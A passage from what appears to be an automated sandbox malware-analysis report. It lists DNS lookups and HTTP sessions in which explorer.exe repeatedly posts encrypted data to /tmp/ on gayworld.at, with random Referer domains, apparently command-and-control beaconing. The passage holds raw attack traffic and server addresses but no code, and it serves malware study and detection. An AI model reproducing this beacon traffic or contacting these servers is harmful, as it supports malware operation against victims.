                  Oct 10, 2022 23:21:13.857969999 CEST8.8.8.8192.168.2.50x2bceNo error (0)gayworld.at222.232.238.243A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:13.857969999 CEST8.8.8.8192.168.2.50x2bceNo error (0)gayworld.at211.171.233.126A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:15.750191927 CEST8.8.8.8192.168.2.50x4cc1No error (0)gayworld.at123.213.233.194A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:15.750191927 CEST8.8.8.8192.168.2.50x4cc1No error (0)gayworld.at181.110.91.40A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:15.750191927 CEST8.8.8.8192.168.2.50x4cc1No error (0)gayworld.at175.120.254.9A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:15.750191927 CEST8.8.8.8192.168.2.50x4cc1No error (0)gayworld.at211.171.233.129A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:15.750191927 CEST8.8.8.8192.168.2.50x4cc1No error (0)gayworld.at151.251.24.5A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:15.750191927 CEST8.8.8.8192.168.2.50x4cc1No error (0)gayworld.at190.122.162.239A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:15.750191927 CEST8.8.8.8192.168.2.50x4cc1No error (0)gayworld.at195.158.3.162A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:15.750191927 CEST8.8.8.8192.168.2.50x4cc1No error (0)gayworld.at185.95.186.58A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:15.750191927 CEST8.8.8.8192.168.2.50x4cc1No error (0)gayworld.at222.232.238.243A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:15.750191927 CEST8.8.8.8192.168.2.50x4cc1No error (0)gayworld.at211.171.233.126A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:17.379950047 CEST8.8.8.8192.168.2.50xa3d3No error (0)gayworld.at123.213.233.194A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:17.379950047 CEST8.8.8.8192.168.2.50xa3d3No error (0)gayworld.at181.110.91.40A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:17.379950047 CEST8.8.8.8192.168.2.50xa3d3No error (0)gayworld.at175.120.254.9A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:17.379950047 CEST8.8.8.8192.168.2.50xa3d3No error (0)gayworld.at211.171.233.129A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:17.379950047 CEST8.8.8.8192.168.2.50xa3d3No error (0)gayworld.at151.251.24.5A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:17.379950047 CEST8.8.8.8192.168.2.50xa3d3No error (0)gayworld.at190.122.162.239A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:17.379950047 CEST8.8.8.8192.168.2.50xa3d3No error (0)gayworld.at195.158.3.162A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:17.379950047 CEST8.8.8.8192.168.2.50xa3d3No error (0)gayworld.at185.95.186.58A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:17.379950047 CEST8.8.8.8192.168.2.50xa3d3No error (0)gayworld.at222.232.238.243A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:17.379950047 CEST8.8.8.8192.168.2.50xa3d3No error (0)gayworld.at211.171.233.126A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:18.858844995 CEST8.8.8.8192.168.2.50xb534No error (0)gayworld.at123.213.233.194A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:18.858844995 CEST8.8.8.8192.168.2.50xb534No error (0)gayworld.at181.110.91.40A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:18.858844995 CEST8.8.8.8192.168.2.50xb534No error (0)gayworld.at175.120.254.9A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:18.858844995 CEST8.8.8.8192.168.2.50xb534No error (0)gayworld.at211.171.233.129A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:18.858844995 CEST8.8.8.8192.168.2.50xb534No error (0)gayworld.at151.251.24.5A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:18.858844995 CEST8.8.8.8192.168.2.50xb534No error (0)gayworld.at190.122.162.239A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:18.858844995 CEST8.8.8.8192.168.2.50xb534No error (0)gayworld.at195.158.3.162A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:18.858844995 CEST8.8.8.8192.168.2.50xb534No error (0)gayworld.at185.95.186.58A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:18.858844995 CEST8.8.8.8192.168.2.50xb534No error (0)gayworld.at222.232.238.243A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:18.858844995 CEST8.8.8.8192.168.2.50xb534No error (0)gayworld.at211.171.233.126A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:20.353420973 CEST8.8.8.8192.168.2.50xab12No error (0)gayworld.at123.213.233.194A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:20.353420973 CEST8.8.8.8192.168.2.50xab12No error (0)gayworld.at181.110.91.40A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:20.353420973 CEST8.8.8.8192.168.2.50xab12No error (0)gayworld.at175.120.254.9A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:20.353420973 CEST8.8.8.8192.168.2.50xab12No error (0)gayworld.at211.171.233.129A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:20.353420973 CEST8.8.8.8192.168.2.50xab12No error (0)gayworld.at151.251.24.5A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:20.353420973 CEST8.8.8.8192.168.2.50xab12No error (0)gayworld.at190.122.162.239A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:20.353420973 CEST8.8.8.8192.168.2.50xab12No error (0)gayworld.at195.158.3.162A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:20.353420973 CEST8.8.8.8192.168.2.50xab12No error (0)gayworld.at185.95.186.58A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:20.353420973 CEST8.8.8.8192.168.2.50xab12No error (0)gayworld.at222.232.238.243A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:20.353420973 CEST8.8.8.8192.168.2.50xab12No error (0)gayworld.at211.171.233.126A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:21.829123974 CEST8.8.8.8192.168.2.50x3a8bNo error (0)disk.yandex.ru87.250.250.50A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:22.566296101 CEST8.8.8.8192.168.2.50x86b3No error (0)gayworld.at123.213.233.194A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:22.566296101 CEST8.8.8.8192.168.2.50x86b3No error (0)gayworld.at181.110.91.40A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:22.566296101 CEST8.8.8.8192.168.2.50x86b3No error (0)gayworld.at175.120.254.9A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:22.566296101 CEST8.8.8.8192.168.2.50x86b3No error (0)gayworld.at211.171.233.129A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:22.566296101 CEST8.8.8.8192.168.2.50x86b3No error (0)gayworld.at151.251.24.5A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:22.566296101 CEST8.8.8.8192.168.2.50x86b3No error (0)gayworld.at190.122.162.239A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:22.566296101 CEST8.8.8.8192.168.2.50x86b3No error (0)gayworld.at195.158.3.162A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:22.566296101 CEST8.8.8.8192.168.2.50x86b3No error (0)gayworld.at185.95.186.58A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:22.566296101 CEST8.8.8.8192.168.2.50x86b3No error (0)gayworld.at222.232.238.243A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:22.566296101 CEST8.8.8.8192.168.2.50x86b3No error (0)gayworld.at211.171.233.126A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:24.050858021 CEST8.8.8.8192.168.2.50xdfd0No error (0)gayworld.at123.213.233.194A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:24.050858021 CEST8.8.8.8192.168.2.50xdfd0No error (0)gayworld.at181.110.91.40A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:24.050858021 CEST8.8.8.8192.168.2.50xdfd0No error (0)gayworld.at175.120.254.9A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:24.050858021 CEST8.8.8.8192.168.2.50xdfd0No error (0)gayworld.at211.171.233.129A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:24.050858021 CEST8.8.8.8192.168.2.50xdfd0No error (0)gayworld.at151.251.24.5A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:24.050858021 CEST8.8.8.8192.168.2.50xdfd0No error (0)gayworld.at190.122.162.239A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:24.050858021 CEST8.8.8.8192.168.2.50xdfd0No error (0)gayworld.at195.158.3.162A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:24.050858021 CEST8.8.8.8192.168.2.50xdfd0No error (0)gayworld.at185.95.186.58A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:24.050858021 CEST8.8.8.8192.168.2.50xdfd0No error (0)gayworld.at222.232.238.243A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:24.050858021 CEST8.8.8.8192.168.2.50xdfd0No error (0)gayworld.at211.171.233.126A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:25.894352913 CEST8.8.8.8192.168.2.50x7cNo error (0)gayworld.at211.171.233.129A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:25.894352913 CEST8.8.8.8192.168.2.50x7cNo error (0)gayworld.at151.251.24.5A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:25.894352913 CEST8.8.8.8192.168.2.50x7cNo error (0)gayworld.at190.122.162.239A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:25.894352913 CEST8.8.8.8192.168.2.50x7cNo error (0)gayworld.at195.158.3.162A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:25.894352913 CEST8.8.8.8192.168.2.50x7cNo error (0)gayworld.at185.95.186.58A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:25.894352913 CEST8.8.8.8192.168.2.50x7cNo error (0)gayworld.at222.232.238.243A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:25.894352913 CEST8.8.8.8192.168.2.50x7cNo error (0)gayworld.at211.171.233.126A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:25.894352913 CEST8.8.8.8192.168.2.50x7cNo error (0)gayworld.at123.213.233.194A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:25.894352913 CEST8.8.8.8192.168.2.50x7cNo error (0)gayworld.at181.110.91.40A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:25.894352913 CEST8.8.8.8192.168.2.50x7cNo error (0)gayworld.at175.120.254.9A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:27.193085909 CEST8.8.8.8192.168.2.50xa459No error (0)gayworld.at175.120.254.9A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:27.193085909 CEST8.8.8.8192.168.2.50xa459No error (0)gayworld.at211.171.233.129A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:27.193085909 CEST8.8.8.8192.168.2.50xa459No error (0)gayworld.at151.251.24.5A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:27.193085909 CEST8.8.8.8192.168.2.50xa459No error (0)gayworld.at190.122.162.239A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:27.193085909 CEST8.8.8.8192.168.2.50xa459No error (0)gayworld.at195.158.3.162A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:27.193085909 CEST8.8.8.8192.168.2.50xa459No error (0)gayworld.at185.95.186.58A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:27.193085909 CEST8.8.8.8192.168.2.50xa459No error (0)gayworld.at222.232.238.243A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:27.193085909 CEST8.8.8.8192.168.2.50xa459No error (0)gayworld.at211.171.233.126A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:27.193085909 CEST8.8.8.8192.168.2.50xa459No error (0)gayworld.at123.213.233.194A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:27.193085909 CEST8.8.8.8192.168.2.50xa459No error (0)gayworld.at181.110.91.40A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:28.701738119 CEST8.8.8.8192.168.2.50xe8d9No error (0)gayworld.at123.213.233.194A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:28.701738119 CEST8.8.8.8192.168.2.50xe8d9No error (0)gayworld.at181.110.91.40A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:28.701738119 CEST8.8.8.8192.168.2.50xe8d9No error (0)gayworld.at175.120.254.9A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:28.701738119 CEST8.8.8.8192.168.2.50xe8d9No error (0)gayworld.at211.171.233.129A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:28.701738119 CEST8.8.8.8192.168.2.50xe8d9No error (0)gayworld.at151.251.24.5A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:28.701738119 CEST8.8.8.8192.168.2.50xe8d9No error (0)gayworld.at190.122.162.239A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:28.701738119 CEST8.8.8.8192.168.2.50xe8d9No error (0)gayworld.at195.158.3.162A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:28.701738119 CEST8.8.8.8192.168.2.50xe8d9No error (0)gayworld.at185.95.186.58A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:28.701738119 CEST8.8.8.8192.168.2.50xe8d9No error (0)gayworld.at222.232.238.243A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:28.701738119 CEST8.8.8.8192.168.2.50xe8d9No error (0)gayworld.at211.171.233.126A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:30.204687119 CEST8.8.8.8192.168.2.50x3506No error (0)gayworld.at175.120.254.9A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:30.204687119 CEST8.8.8.8192.168.2.50x3506No error (0)gayworld.at211.171.233.129A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:30.204687119 CEST8.8.8.8192.168.2.50x3506No error (0)gayworld.at151.251.24.5A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:30.204687119 CEST8.8.8.8192.168.2.50x3506No error (0)gayworld.at190.122.162.239A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:30.204687119 CEST8.8.8.8192.168.2.50x3506No error (0)gayworld.at195.158.3.162A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:30.204687119 CEST8.8.8.8192.168.2.50x3506No error (0)gayworld.at185.95.186.58A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:30.204687119 CEST8.8.8.8192.168.2.50x3506No error (0)gayworld.at222.232.238.243A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:30.204687119 CEST8.8.8.8192.168.2.50x3506No error (0)gayworld.at211.171.233.126A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:30.204687119 CEST8.8.8.8192.168.2.50x3506No error (0)gayworld.at123.213.233.194A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:30.204687119 CEST8.8.8.8192.168.2.50x3506No error (0)gayworld.at181.110.91.40A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:31.699969053 CEST8.8.8.8192.168.2.50x9f11No error (0)gayworld.at175.120.254.9A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:31.699969053 CEST8.8.8.8192.168.2.50x9f11No error (0)gayworld.at211.171.233.129A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:31.699969053 CEST8.8.8.8192.168.2.50x9f11No error (0)gayworld.at151.251.24.5A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:31.699969053 CEST8.8.8.8192.168.2.50x9f11No error (0)gayworld.at190.122.162.239A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:31.699969053 CEST8.8.8.8192.168.2.50x9f11No error (0)gayworld.at195.158.3.162A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:31.699969053 CEST8.8.8.8192.168.2.50x9f11No error (0)gayworld.at185.95.186.58A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:31.699969053 CEST8.8.8.8192.168.2.50x9f11No error (0)gayworld.at222.232.238.243A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:31.699969053 CEST8.8.8.8192.168.2.50x9f11No error (0)gayworld.at211.171.233.126A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:31.699969053 CEST8.8.8.8192.168.2.50x9f11No error (0)gayworld.at123.213.233.194A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:31.699969053 CEST8.8.8.8192.168.2.50x9f11No error (0)gayworld.at181.110.91.40A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:33.180548906 CEST8.8.8.8192.168.2.50x14fdNo error (0)gayworld.at211.171.233.126A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:33.180548906 CEST8.8.8.8192.168.2.50x14fdNo error (0)gayworld.at123.213.233.194A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:33.180548906 CEST8.8.8.8192.168.2.50x14fdNo error (0)gayworld.at181.110.91.40A (IP address)IN (0x0001)false
                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  0 | 192.168.2.5 | 49711 | 87.250.250.50 | 443 | C:\Windows\explorer.exe
                  Timestamp | kBytes transferred | Direction | Data


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  1 | 192.168.2.5 | 49730 | 5.135.247.111 | 443 | C:\Windows\explorer.exe
                  Timestamp | kBytes transferred | Direction | Data


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  10 | 192.168.2.5 | 49703 | 123.213.233.194 | 80 | C:\Windows\explorer.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Oct 10, 2022 23:20:51.020308971 CEST | 120 | OUT | POST /tmp/ HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://hbrskgx.com/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 197
                  Host: gayworld.at
                  Oct 10, 2022 23:20:51.911545992 CEST | 121 | IN | HTTP/1.0 404 Not Found
                  Date: Mon, 10 Oct 2022 21:20:51 GMT
                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                  X-Powered-By: PHP/5.6.40
                  Content-Length: 49
                  Connection: close
                  Content-Type: text/html; charset=utf-8


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  11 | 192.168.2.5 | 49705 | 185.95.186.58 | 80 | C:\Windows\explorer.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Oct 10, 2022 23:21:13.333100080 CEST | 122 | OUT | POST /tmp/ HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://ajrrmv.net/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 286
                  Host: gayworld.at
                  Oct 10, 2022 23:21:13.709359884 CEST | 123 | IN | HTTP/1.0 404 Not Found
                  Date: Mon, 10 Oct 2022 21:21:13 GMT
                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                  X-Powered-By: PHP/5.6.40
                  Content-Length: 331
                  Connection: close
                  Content-Type: text/html; charset=utf-8
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  12 | 192.168.2.5 | 49706 | 123.213.233.194 | 80 | C:\Windows\explorer.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Oct 10, 2022 23:21:14.135349035 CEST | 124 | OUT | POST /tmp/ HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://ejnrvuf.net/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 355
                  Host: gayworld.at
                  Oct 10, 2022 23:21:15.289622068 CEST | 125 | IN | HTTP/1.0 404 Not Found
                  Date: Mon, 10 Oct 2022 21:21:14 GMT
                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                  X-Powered-By: PHP/5.6.40
                  Content-Length: 331
                  Connection: close
                  Content-Type: text/html; charset=utf-8
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  13 | 192.168.2.5 | 49707 | 123.213.233.194 | 80 | C:\Windows\explorer.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Oct 10, 2022 23:21:16.044111013 CEST | 126 | OUT | POST /tmp/ HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://edudewfeyy.org/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 347
                  Host: gayworld.at
                  Oct 10, 2022 23:21:17.202096939 CEST | 127 | IN | HTTP/1.0 404 Not Found
                  Date: Mon, 10 Oct 2022 21:21:16 GMT
                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                  X-Powered-By: PHP/5.6.40
                  Content-Length: 331
                  Connection: close
                  Content-Type: text/html; charset=utf-8
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  14 | 192.168.2.5 | 49708 | 123.213.233.194 | 80 | C:\Windows\explorer.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Oct 10, 2022 23:21:17.650942087 CEST | 128 | OUT | POST /tmp/ HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://yabmhcrfhk.com/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 282
                  Host: gayworld.at
                  Oct 10, 2022 23:21:18.822432041 CEST | 129 | IN | HTTP/1.0 404 Not Found
                  Date: Mon, 10 Oct 2022 21:21:18 GMT
                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                  X-Powered-By: PHP/5.6.40
                  Content-Length: 331
                  Connection: close
                  Content-Type: text/html; charset=utf-8
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  15 | 192.168.2.5 | 49709 | 123.213.233.194 | 80 | C:\Windows\explorer.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Oct 10, 2022 23:21:19.131381035 CEST | 130 | OUT | POST /tmp/ HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://ksluvey.org/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 181
                  Host: gayworld.at
                  Oct 10, 2022 23:21:19.135519981 CEST | 130 | OUT | Data Raw: 3b 6e 51 13 f7 c3 6c 22 df a9 b3 77 73 70 09 cc 78 0a cb 97 6a 71 e3 6a 7d 7d 7b 92 32 c2 cf 6f 93 5d c0 2c 02 6b 2b 1c ea ec 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 06 6b 2c 90 f5 76 0b 75 5b 4a e7 a6
                  Data Ascii: ;nQl"wspxjqj}}{2o],k+?*$`7C[zqNA -[k,vu[JeBFNhubLVi&gZpJ\|7+`S'W0W/#FtcR=v_l
                  Oct 10, 2022 23:21:20.325900078 CEST | 131 | IN | HTTP/1.0 404 Not Found
                  Date: Mon, 10 Oct 2022 21:21:19 GMT
                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                  X-Powered-By: PHP/5.6.40
                  Content-Length: 331
                  Connection: close
                  Content-Type: text/html; charset=utf-8
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  16 | 192.168.2.5 | 49710 | 123.213.233.194 | 80 | C:\Windows\explorer.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Oct 10, 2022 23:21:20.622915030 CEST | 132 | OUT | POST /tmp/ HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://vkbntx.org/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 148
                  Host: gayworld.at
                  Oct 10, 2022 23:21:20.622915030 CEST | 132 | OUT | Data Raw: 3b 6e 51 13 f7 c3 6c 22 df a9 b3 77 73 70 09 cc 78 0a cb 97 6a 71 e3 6a 7d 7d 7b 92 32 c2 cf 6f 93 5d c0 2c 02 6b 2b 1c ea ec 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 07 6b 2c 90 f5 76 0b 75 6f 24 ed e4
                  Data Ascii: ;nQl"wspxjqj}}{2o],k+?*$`7C[zqNA -[k,vuo$a|0kmh0/F3J\#C0O`Xh
                  Oct 10, 2022 23:21:21.793978930 CEST | 132 | IN | HTTP/1.0 404 Not Found
                  Date: Mon, 10 Oct 2022 21:21:21 GMT
                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                  X-Powered-By: PHP/5.6.40
                  Content-Length: 51
                  Connection: close
                  Content-Type: text/html; charset=utf-8
                  Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 0f 63 55 ff 76 13 fa f6 43 f6 86 ac b8 37 db 2a 9a f9 10 0b 3c 96 a1 b6 e9 4f f8 6e 36 07 88
                  Data Ascii: #\6cUvC7*<On6


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  17 | 192.168.2.5 | 49712 | 123.213.233.194 | 80 | C:\Windows\explorer.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Oct 10, 2022 23:21:22.834033012 CEST | 154 | OUT | POST /tmp/ HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://qgfdim.com/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 311
                  Host: gayworld.at
                  Oct 10, 2022 23:21:22.834033012 CEST | 154 | OUT | Data Raw: 3b 6e 51 13 f7 c3 6c 22 df a9 b3 77 73 70 09 cc 78 0a cb 97 6a 71 e3 6a 7d 7d 7b 92 32 c2 cf 6f 93 5d c0 2c 02 6b 2b 1c ea ec 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 04 6b 2c 90 f5 76 0b 75 43 28 e5 a2
                  Data Ascii: ;nQl"wspxjqj}}{2o],k+?*$`7C[zqNA -[k,vuC(}9Sn\pSVN2n,]HElS5yJ^|-RK3#1BYTwp8;ORK9tSG9F)Qz
                  Oct 10, 2022 23:21:24.023444891 CEST | 155 | IN | HTTP/1.0 404 Not Found
                  Date: Mon, 10 Oct 2022 21:21:23 GMT
                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                  X-Powered-By: PHP/5.6.40
                  Content-Length: 331
                  Connection: close
